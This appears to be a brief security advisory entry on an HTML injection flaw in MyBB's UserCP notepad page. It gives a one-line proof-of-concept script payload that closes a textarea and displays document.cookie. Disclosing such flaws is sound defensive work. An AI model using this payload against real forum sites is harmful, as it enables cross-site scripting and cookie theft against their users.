• info
• discussion
• exploit
• solution
• references

MyBB Notepad UserCP.PHP HTML Injection Vulnerability



An exploit is not required.

The following proof of concept is available:

http://www.example.com/usercp.php?action=notepad

notepad=</textarea><script>alert(document.cookie)</script>